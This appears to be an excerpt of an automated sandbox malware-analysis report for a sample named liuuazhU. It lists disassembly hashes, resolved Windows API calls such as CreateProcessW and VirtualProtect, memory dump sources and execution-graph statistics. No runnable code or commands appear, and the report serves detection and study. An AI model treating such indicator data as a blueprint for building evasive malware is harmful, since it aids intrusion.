                                                                                        • Instruction ID: 63fe61411c5b4245d40f6bb31ff9fdf921fd68446a0385208d3283b77cd7cd79
                                                                                        • Opcode Fuzzy Hash: 396ff4d00c58848ac350f646174db21a0a8d72b8d1ac01ce4a2de2e6234c3fa5
                                                                                        • Instruction Fuzzy Hash: E1F18D74E01228CFDB64DFA5C994BDDBBB2AF58300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bcad923e8a0920b9f36d45ea2ebc9b19141ab166e8badc5b2aa244a155343d2a
                                                                                        • Instruction ID: 5f4668ffdd08059f068824dab78be3e4223cb7bf1fe63e71a31e0daa7e13d8cb
                                                                                        • Opcode Fuzzy Hash: bcad923e8a0920b9f36d45ea2ebc9b19141ab166e8badc5b2aa244a155343d2a
                                                                                        • Instruction Fuzzy Hash: EFF18E74E01228CFDB64DFA5C994BADBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cdba854d38871aba85f5321adbf5c45e53a1c646f3d88b0125233447d404305b
                                                                                        • Instruction ID: 71548e57c76c906b11feafe49d8e87dcf51c2d63f23c3a5e99b6689f9609fee5
                                                                                        • Opcode Fuzzy Hash: cdba854d38871aba85f5321adbf5c45e53a1c646f3d88b0125233447d404305b
                                                                                        • Instruction Fuzzy Hash: C8F19E74E01228CFDB64DFA9C994BADBBB2BF58300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b36206a9e90772a8dd7cbe757e4f27e8378349a2d1a1098c714024171a1c4dee
                                                                                        • Instruction ID: 8eb27149d085ac1740ed0b8bf7c0ab26e1dc6acb21e1843a91c53e5df7c1269e
                                                                                        • Opcode Fuzzy Hash: b36206a9e90772a8dd7cbe757e4f27e8378349a2d1a1098c714024171a1c4dee
                                                                                        • Instruction Fuzzy Hash: 42F18E74E01228CFDB64DFA5C994BEDBBB2AF58300F1081AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3a3f7d26a14b9891da8d6946362106835a3a23f42495bb4e1ba3a460400fe5be
                                                                                        • Instruction ID: d213b4f2e00ba7d10075642c7840dd152319bf80c64e316058a99a4b81103e77
                                                                                        • Opcode Fuzzy Hash: 3a3f7d26a14b9891da8d6946362106835a3a23f42495bb4e1ba3a460400fe5be
                                                                                        • Instruction Fuzzy Hash: 7BF19E74E01228CFDB64CFA5C994BADBBB2BF98300F1085AAE509A7354DB355E85CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ef91fe40db60c130720b9d6e182837249e9b0a97bf736c162900464ef19ef3a9
                                                                                        • Instruction ID: 6ea744d5335702fbf87c05e374cc2476874e19b0b5fc774425e7f780a14d64d8
                                                                                        • Opcode Fuzzy Hash: ef91fe40db60c130720b9d6e182837249e9b0a97bf736c162900464ef19ef3a9
                                                                                        • Instruction Fuzzy Hash: 93F18D74E01228CFDB64DFA5C994B9DBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        APIs
                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,1CFD18C0), ref: 004170C5
                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                        • __freea.LIBCMT ref: 004172A4
                                                                                        • __freea.LIBCMT ref: 004172AD
                                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                        • _malloc.LIBCMT ref: 00417362
                                                                                        • _memset.LIBCMT ref: 00417384
                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                                        • __freea.LIBCMT ref: 004173CF
                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3809854901-0
                                                                                        • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                        • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                        • _malloc.LIBCMT ref: 00405842
                                                                                        • _malloc.LIBCMT ref: 00405906
                                                                                        • _malloc.LIBCMT ref: 00405930
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc$AllocateHeap
                                                                                        • String ID: 1.2.3
                                                                                        • API String ID: 680241177-2310465506
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 3886058894-0
                                                                                        APIs
                                                                                        • EntryPoint.LIUUAZHU(80070057), ref: 004017EE
                                                                                          • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                          • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                        • EntryPoint.LIUUAZHU(80070057), ref: 00401800
                                                                                        • EntryPoint.LIUUAZHU(80070057), ref: 00401813
                                                                                        • __recalloc.LIBCMT ref: 00401828
                                                                                        • EntryPoint.LIUUAZHU(8007000E), ref: 00401839
                                                                                        • EntryPoint.LIUUAZHU(8007000E), ref: 00401853
                                                                                        • _calloc.LIBCMT ref: 00401861
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                        • String ID:
                                                                                        • API String ID: 1721462702-0
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 00414744
                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                                        • __lock.LIBCMT ref: 00414779
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                        • String ID: @.B
                                                                                        • API String ID: 3521780317-470711618
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2805327698-0
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                        • __lock.LIBCMT ref: 00414008
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                        • InterlockedIncrement.KERNEL32(1CFD1660), ref: 00414050
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                        • String ID:
                                                                                        • API String ID: 4271482742-0
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                        • API String ID: 1646373207-3105848591
                                                                                        APIs
                                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                                        • __locking.LIBCMT ref: 0040C791
                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                        • String ID:
                                                                                        • API String ID: 2395185920-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _fseek_malloc_memset
                                                                                        • String ID:
                                                                                        • API String ID: 208892515-0
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.8%
                                                                                        Dynamic/Decrypted Code Coverage:56.9%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:397
                                                                                        Total number of Limit Nodes:48
                                                                                        execution_graph (interactive call graph in the original report; node addresses and edges omitted here). APIs resolved on graph nodes: LdrInitializeThunk, CloseHandle, WaitForInputIdle, DuplicateHandle, WaitMessage, GetModuleHandleW, GetModuleHandleA, CreateWindowExW, CallWindowProcW, CreateProcessW, HeapCreate, GetCommandLineA, OleInitialize, GetCurrentProcessId, CreateToolhelp32Snapshot, Module32First, Module32Next, FindResourceA, LoadResource, LockResource, SizeofResource, FreeResource, LoadLibraryA, GetProcAddress, VariantInit, VariantClear, SafeArrayCreate, SafeArrayCreateVector, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayDestroy, SysAllocString, SysFreeString, lstrlenA, MultiByteToWideChar, GetLastError, RtlAllocateHeap, RaiseException, InterlockedDecrement, LeaveCriticalSection, ExitProcess, VirtualProtect, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                        • API String ID: 0-2735749406
                                                                                        • Opcode ID: 16e756d392f5cd396b0362851c50de72699b4be0102c4c1725e0d9eb9bb221c3
                                                                                        • Instruction ID: 647e32adea0085dbbb334bfe107042fb25fbf92048711d6f43094e9ad306bff1
                                                                                        • Opcode Fuzzy Hash: 16e756d392f5cd396b0362851c50de72699b4be0102c4c1725e0d9eb9bb221c3
                                                                                        • Instruction Fuzzy Hash: 56826B38A00A09CFCB05CF68C584A9EBBF2BF58B14F15955AE809DB365D7B0ED41CB54
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3119790903.000000002E420000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E420000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e420000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: c12f6f33b2302193eb533bdf3f16e3ba7e1df37ba17af4ff4975f43a781d0c0a
                                                                                        • Instruction ID: dd64dc4f120fb4f63e794863ed7083c239b6188ccec644b1c762d68dd80b1037
                                                                                        • Opcode Fuzzy Hash: c12f6f33b2302193eb533bdf3f16e3ba7e1df37ba17af4ff4975f43a781d0c0a
                                                                                        • Instruction Fuzzy Hash: EC02A174E01218CFDB14DFA9D884B9DBBB2BF88304F10D1AAE508AB355DB75A985CF50
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120196643.000000002E7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E7C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e7c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a830069eb10a6669d1f7b5bb31c29c2fd2268dc19aa95b78f15318fac2b869fd
                                                                                        • Instruction ID: f5bd1fcf63c9ad95b4ed4e62e5fd5c8826c518c97b1ec8cdcf20b08ba9fa9ca4
                                                                                        • Opcode Fuzzy Hash: a830069eb10a6669d1f7b5bb31c29c2fd2268dc19aa95b78f15318fac2b869fd
                                                                                        • Instruction Fuzzy Hash: 2FC138B1D053489FCF16CFA5C890ACDBFF5AF1A310F15A09AE448AB226D7359A85CF11
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120296894.000000002E820000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E820000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e820000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fbab556190fc12967ddc34ff8d5eb12e22610405a894a78be8123c6105fba139
                                                                                        • Instruction ID: b5ee51179791416480c68bade22dae1c311d267802ecf2459ca3cf8628ca1be1
                                                                                        • Opcode Fuzzy Hash: fbab556190fc12967ddc34ff8d5eb12e22610405a894a78be8123c6105fba139
                                                                                        • Instruction Fuzzy Hash: C8D19030A00A49CFDB04CFA9C898B9DBBF1BFA4314F158168E449AF2A5DB74D985CF50
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000000,2D94D94A), ref: 2D94E5F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3119074821.000000002D940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D940000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2d940000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 0114fc08ebd1fefbc1999c925f89ad9e75d65d85989e4982073f8006f2226e94
                                                                                        • Instruction ID: f4e87f3b18400632d0bcb777b95b15fd9e87987034820d55f98b4d7893271351
                                                                                        • Opcode Fuzzy Hash: 0114fc08ebd1fefbc1999c925f89ad9e75d65d85989e4982073f8006f2226e94
                                                                                        • Instruction Fuzzy Hash: 95C1C074D00218DFDB11CFA9C880BAEBBF6BF49304F2491A9E508B7261E774A985CF45
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3119790903.000000002E420000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E420000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e420000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 7de691fc1c7688f521c2d0adbc1c79b2e857cc1609d04c7760d183bc788a6da8
                                                                                        • Instruction ID: 041df0b9a58e7bcfa387173ea55ba1b365dc64ccb0c4054a8f4aac52d6f2cf2f
                                                                                        • Opcode Fuzzy Hash: 7de691fc1c7688f521c2d0adbc1c79b2e857cc1609d04c7760d183bc788a6da8
                                                                                        • Instruction Fuzzy Hash: E891E371E00A19CBCB14DFBAC96069EBBF2EF98310F10857AD405A7395DB389D01CB91
                                                                                        APIs
                                                                                        • WaitForInputIdle.USER32(?,?), ref: 2D94E864
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3119074821.000000002D940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D940000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2d940000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID: IdleInputWait
                                                                                        • String ID:
                                                                                        • API String ID: 2200289081-0
                                                                                        • Opcode ID: c4c44217fac2431d6a7bed3b76b78d616b8a35620cd3b0c082dfe0e1e68ec273
                                                                                        • Instruction ID: f073cac3f389127b2be91f4aee4caf5bc5665761bf03be7c3d76b8ee9cfbc029
                                                                                        • Opcode Fuzzy Hash: c4c44217fac2431d6a7bed3b76b78d616b8a35620cd3b0c082dfe0e1e68ec273
                                                                                        • Instruction Fuzzy Hash: 9231B9B4D002589FCB10CFAAC984A9EFBF5BB49300F20902AE408BB355D774A945CF58
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8DC.
                                                                                        • API String ID: 0-1690975047
                                                                                        • Opcode ID: 0a0eeacab5c479fd9d665ecbbcb21aaa321fc170294a7620e9ae0934b0239dbc
                                                                                        • Instruction ID: 543fc3fd5fa09a80f8746302e5b4e9159b87b59852c3178ff4970cc4566628b4
                                                                                        • Opcode Fuzzy Hash: 0a0eeacab5c479fd9d665ecbbcb21aaa321fc170294a7620e9ae0934b0239dbc
                                                                                        • Instruction Fuzzy Hash: 52B1A174E012298FEB24CF6AC944BDDBBF2BF99300F10D1AAD508A7254DB745A85CF11
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8DC.
                                                                                        • API String ID: 0-1690975047
                                                                                        • Opcode ID: 69f35cdc2e689e435736be7ca7bd1d9324ac20e40c6feaba8da7d9f1981e16ae
                                                                                        • Instruction ID: be277e92aa022027dc9ecb12ac5efe0379ed2c700e6eed57711dee3b89ac583b
                                                                                        • Opcode Fuzzy Hash: 69f35cdc2e689e435736be7ca7bd1d9324ac20e40c6feaba8da7d9f1981e16ae
                                                                                        • Instruction Fuzzy Hash: 7271A374E016288FEB68CF6AC854B9DBBF2AF89300F14C1AAD548A7254DB744A85CF51
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
